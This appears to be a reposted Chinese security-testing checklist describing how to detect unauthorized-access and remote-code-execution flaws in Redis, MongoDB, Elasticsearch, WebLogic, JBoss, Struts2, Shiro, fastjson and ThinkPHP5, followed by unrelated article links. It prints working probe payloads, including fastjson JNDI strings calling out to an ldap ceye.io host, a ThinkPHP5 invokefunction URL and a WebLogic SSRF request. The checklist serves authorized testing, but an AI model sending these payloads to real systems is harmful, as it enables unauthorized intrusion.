未授权和代码执行漏洞特征和检测方法

news2024/11/26 10:23:28

文章目录

  • 一、Redis未授权访问
  • 二、MongoDB未授权访问
  • 三、Elasticsearch未授权访问
  • 四、Rsync未授权访问
  • 五、Windows RDP远程代码执行漏洞(CVE-2019-0708)
  • 六、Tomcat Web控制台弱口令
  • 七、WebLogic控制台弱口令&反序列化系列漏洞
  • 八、WebLogic SSRF(无检测方法)
  • 九、WebLogic反序列化工具
  • 十、JBoss反序列化&默认配置漏洞
  • 十一、Apache Struts2远程代码执行漏洞
  • 十二、Apache Shiro反序列化漏洞(无检测方法)
  • 十三、fastjson反序列化漏洞
  • 十四、Java RMI反序列化漏洞(无检测方法)
  • 十五、ThinkPHP5 代码执行漏洞

一、Redis未授权访问

telnet
然后输入info,若回显Redis服务端版本等信息,说明存在未授权访问
在这里插入图片描述

二、MongoDB未授权访问

使用工具“Robo 3T”进行检测,创建指向MongoDB服务器的连接,输入IP地址和端口(默认端口为27017),然后点击Test按钮,如果存在未授权访问漏洞,将提示“Access to databases is available”
在这里插入图片描述

三、Elasticsearch未授权访问

在浏览器中直接访问Elasticsearch节点数据:http://www.example.com:9200/_nodes,当泄漏如下图信息时说明未授权访问漏洞存在。
在这里插入图片描述

四、Rsync未授权访问

在命令行中使用命令rsync rsync://:/(默认端口873)进行检测
若存在未授权访问漏洞,可以通过rsync rsync://://列出指定模块对应路径下的所有文件
在这里插入图片描述

五、Windows RDP远程代码执行漏洞(CVE-2019-0708)

使用工具“rdpscan.exe”进行检测,该工具支持检测单个IP段、CIDR格式IP地址和IP地址列表,具体用法如下:
(a) rdpscan.exe 192.168.1.0/24
(b) rdpscan.exe 192.168.1.1 -p 13389
(c) rdpscan.exe --file ip.txt
在这里插入图片描述

六、Tomcat Web控制台弱口令

在Kali Linux中运行msfconsole,使用auxiliary/scanner/http/tomcat_mgr_login模块,设置好RHOSTS、RPORT(默认为8080)、TARGETURL(默认为/manager/html),然后运行(run或者exploit)
在这里插入图片描述

七、WebLogic控制台弱口令&反序列化系列漏洞

在被测应用系统URL后添加随机字符串,出现404页面,若页面内容如下图,则被测应用系统的中间件为WebLogic.
在这里插入图片描述

测试方法
使用Burp Suite抓取访问被测应用系统的请求,在repeater模块中通过Change request method将请求方式从GET改为POST,将POST的URL修改为/bea_wls_deployment_internal/DeploymentService,并添加请求头username: weblogic和password: weblogic,然后发送请求,如下图:
在这里插入图片描述

若密码不正确,响应“401 Unauthorized”状态码,页面显示“Invalid user name or password”. 当密码正确时,响应“500 Internal Server Error”状态码

八、WebLogic SSRF(无检测方法)

http://www.example.com:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
若页面内容包含字符串“weblogic.uddi.client.structures.exception.XML_SoapException”, 则该WebLogic中间件可能存在SSRF漏洞
在这里插入图片描述

依次修改URL末尾的端口号为常见的22,80,443,7001,8080等端口,若页面中根据端口号不同出现如下字符串,说明存在SSRF漏洞。
在这里插入图片描述

九、WebLogic反序列化工具

在这里插入图片描述

十、JBoss反序列化&默认配置漏洞

抓包发现被测应用系统的响应头中包含JBoss字符串
在这里插入图片描述

或者被测应用系统的404页面包含JBossWeb字符串
在这里插入图片描述

测试方法
在Kali Linux中运行msfconsole,使用auxiliary/scanner/http/jboss_vulnscan模块,设置好RHOSTS、RPORT(默认为80),然后运行(run或者exploit)
在这里插入图片描述

十一、Apache Struts2远程代码执行漏洞

查看被测应用系统的源码,URL接口地址以 “.action” “.do” 结尾或地址中包含“!”符号,或者在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在struts2-core-2..**.jar或xwork-core-2..**.jar格式的jar文件,则需检测是否存在Struts2远程代码执行漏洞。
检测工具
在这里插入图片描述

十二、Apache Shiro反序列化漏洞(无检测方法)

使用Burp Suite抓取访问被测应用系统的请求,在Cookie中添加“rememberMe=1”,重放发送到服务端,若响应包的头中包含“Set-Cookie: rememberMe=deleteMe”,则被测应用系统使用Shiro组件进行开发
在这里插入图片描述

在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在shiro-core-1...jar格式的jar文件,则需检测是否存在Shiro反序列化漏洞

十三、fastjson反序列化漏洞

查看在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在fastjson-1.2.*.**.jar格式的jar文件,或者抓包发现被测应用系统的响应报文中包含“com.alibaba.fastjson”字符串,则需检测是否存在fastjson反序列化漏洞
在这里插入图片描述

检测方法
如前所述,注册ceye.io的账号,使用fastjson反序列化漏洞验证代码及ceye.io的二级子域名http://ceye.io/profile检测目标应用是否存在fastjson反序列化漏洞,方法如下:
使用Burp Suite抓取存在json数据的请求包,修改请求体内容为以下检测内容(可依次检测):
(a){“@type”:“java.net.InetAddress”,“val”:“fastjson..ceye.io “}
(b){”@type":“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:"ldap://fastjson.
.ceye.io /”,“autoCommit”:true}
(c){“name”:{“@type”:“java.lang.Class”,“val”:“com.sun.rowset.JdbcRowSetImpl”},“x”:{“@type”:“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://fastjson.******.ceye.io /”,“autoCommit”:true}}
然后访问http://ceye.io/records/dns, 若页面中出现了fastjson开头的三级子域名解析记录,说明目标存在fastjson反序列化漏洞,如下图:
在这里插入图片描述
在这里插入图片描述

十四、Java RMI反序列化漏洞(无检测方法)

被测应用系统所在服务器开放1099端口或者使用nmap(nmap -v -A -p1-65535 )对服务器进行端口扫描时,nmap识别到服务器的某端口的服务类型为Java RMI Registry,则需检测是否存在Java RMI反序列化漏洞
在这里插入图片描述

十五、ThinkPHP5 代码执行漏洞

访问被测应用系统,若报错页面内容包含“十年磨一剑-为API开发设计的高性能框架”,如下图,则被测应用系统使用ThinkPHP5开发。.
在这里插入图片描述

检测方法
http://www.example.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=hi
若响应包中包含字符串“49f68a5c8493ec2c0bf489821c21fc3b”,则说明存在代码执行漏洞,如下图:
在这里插入图片描述

POST【_method=__construct&filter[]=phpinfo&method=get&get[]=1】到http://www.example.com/?s=captcha,若响应包中包含phpinfo信息,则说明存在代码执行漏洞
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1089482.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

微服务设计原则:构建弹性和可维护的应用

文章目录 1. 单一职责原则2. 独立性和自治性3. 弹性和容错性4. API 网关5. 日志和监控6. 版本管理7. 自动化部署和持续集成8. 安全性9. 数据一致性10. 文档和通信拓展思考结论 🎉欢迎来到架构设计专栏~微服务设计原则:构建弹性和可维护的应用 ☆* o(≧▽…

Linux环境下Qt应用程序安装器(installer)制作

本文介绍Linux环境下Qt应用程序安装器(installer)的制作。 安装器(installer)是将应用程序安装到操作系统平台的可执行文件,它采用向导式对话框指导用户安装应用程序,如我们在Windows操作系统安装Office软件时,有1个向导让你选择安装哪些组件…

力扣:611. 有效三角形的个数

今日为大家分享一道力扣611有效三角形的个数!本文将会为大家为大家讲解题目,然后算法思路,最后再进行代码的实现!希望看完本文能对读者有一定的收获! 一、题目描述 通过题目的描述可以看出,意思是给定一个…

[产品体验] GPT4识图功能

[产品体验] GPT4识图功能 图片配文字超强的OCR能力知识问答多图解释 打开chatgpt的时候突然发现能用识图了,赶紧去体验一下,大大的震撼… 图片配文字 超强的OCR能力 我传上去的图片并不清晰… 还能准确识别,orz ! 知识问答 多…

代码随想录Day18 LeetCode235 二叉搜索树的公共祖先 T701二叉搜索树中的插入操作 T140 删除二叉搜索树中的公共节点

LeetCode T235 二叉搜索树的公共祖先 题目链接235. 二叉搜索树的最近公共祖先 - 力扣(LeetCode) 题目思路 此题不涉及遍历顺序. 关于二叉搜索树的定义,这里我就不过多赘述了,前面几篇都说清楚了,根节点比左子树元素都大,比右子树元素都小,这道题我们就可…

计算机体系结构和操作系统

这篇文章的主要内容是冯诺依曼计算机体系结构和操作系统的理解。 目录 一.冯诺依曼计算机体系结构 二.操作系统的理解 一.冯诺依曼计算机体系结构 如图是冯诺依曼计算机体系结构,计算机本质就是对数据进行处理的机器,图中,数据从输入设备交给…

VMWare配置桥接

一、设置网络模式 二、编辑网卡配置 ip配置的子网掩码和默认网关保持和宿主机一致,ip局域网内不冲突。 # cd /etc/sysconfig/network-scriptslsvim ifcfg-ens160 TYPEEthernet PROXY_METHODnone BROWSER_ONLYno BOOTPROTOnone DEFROUTEyes IPV4_FAILURE_FATALno IP…

【数据结构】双链表的相关操作(声明结构体成员、初始化、判空、增、删、查)

双链表 双链表的特点声明双链表的结构体成员双链表的初始化带头结点的双链表初始化不带头结点的双链表初始化调用双链表的初始化 双链表的判空带头结点的双链表判空不带头结点的双链表判空 双链表的插入(按值插入)头插法建立双链表带头结点的头插法每次调…

每日一题 1488. 避免洪水泛滥(中单,贪心,二分)

思路: 当某一天为晴天,可以选择抽水时,我们是不知道要抽哪一个的,最优解应该是抽接下来最近的要发洪水的湖泊,所以我们先把晴天的坐标保存下来,需要用的时候再拿出来需要注意的是,只有晴天发生…

【MATLAB源码-第46期】基于matlab的OFDM系统多径数目对比,有无CP(循环前缀)对比,有无信道均衡对比。

操作环境: MATLAB 2022a 1、算法描述 OFDM(正交频分复用)是一种频域上的多载波调制技术,经常用于高速数据通信中。以下是关于多径数目、有无CP(循环前缀)以及有无信道均衡在OFDM系统中对误码率的影响&am…

Python对接海康威视机器视觉工业相机

一、下载MVS客户端 海康机器人-机器视觉-下载中心 二、解压并安装MVS客户端 三、找到MVS示例代码(代码在MVS的安装位置) 工业相机只允许单条连接,也就是说MVS如果连接了相机,python代码就无法获取数据,此时必须退出M…

计算机毕业设计 大学生选修选课系统的设计与实现 Javaweb项目 Java实战项目 前后端分离 文档报告 代码讲解 安装调试

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点…

pinctrl子系统 - 架构和结构体关系(四)

一,pinctrl的引入 由于SoC系统越来越复杂、集成度越来越高,SoC中pin的数量也越来越多、功能也越来越复杂,这就对如何管理、使用这些pins提出了挑战。因此,用于管理这些pins的硬件模块(pin controller)就出…

MySQL读写分离之一主一从

原理 MySQL 的主从复制,是基于二进制日志( binlog )实现的。 准备 主机 角色 用户名 密码 192.168.2.3 master root newPwd520 192.168.2.4 slave root newPwd520 主从复制的搭建,可以参考 MYSQL的主从复制-CSDN博客 一主一从读…

【K8S】集群中部署nginx应用 运行手写yaml文件报错排查过程

文章目录 ❌报错信息🔎排查过程✅问题解决 ❌报错信息 提取报错信息【 unknown field “spec.selector.replicas”】【 unknown field “spec.selector.template”】 [rootmaster ~]# kubectl apply -f nginx-deployment.yaml Error from server (BadRequest): erro…

CCF CSP认证 历年题目自练Day30

题目一 试题编号: 202203-1 试题名称: 未初始化警告 时间限制: 1.0s 内存限制: 512.0MB 问题描述: 题目背景 一个未经初始化的变量,里面存储的值可能是任意的。因此直接使用未初始化的变量,比…

通过API接口进行商品价格监控,可以按照以下步骤进行操作

要实现通过API接口进行商品价格监控,可以按照以下步骤进行操作: 申请平台账号并选择API接口:根据需要的功能,选择相应的API接口,例如商品API接口、店铺API接口、订单API接口等,这一步骤通常需要我们在相应…

MyBatis(中)

1、动态sql&#xff1a; 1、if标签&#xff1a; mapper接口: //if 标签 多条件查询List<Car> selectByMultiConditional(Param("brand") String brand,Param("guidePrice") Double guidePrice,Param("carType") String carType); map…

ATF(TF-A)之UBSAN动态代码分析

安全之安全(security)博客目录导读 目录 一、UBSAN简介 二、TF-A中UBSAN配置选项 一、UBSAN简介 未定义行为消毒器(Undefined Behavior Sanitizer&#xff0c;UBSAN)是Linux内核的未定义行为动态检测器。 详细信息可参考&#xff1a;https://github.com/google/kernel-sanit…

3D 生成重建007-Fantasia3D和Magic3d两阶段玩转文生3D

3D生成重建3D 生成重建007-Fantasia3D和magic3d 文章目录 0 论文工作1 论文方法1.1 magic3d1.2 Fantasia3D 2 效果2.1 magic3d2.2 fantasia3d 0 论文工作 两篇论文都是两阶段法进行文生3d&#xff0c;其中fantasia3D主要对形状和外表进行解耦&#xff0c;然后先对geometry进行…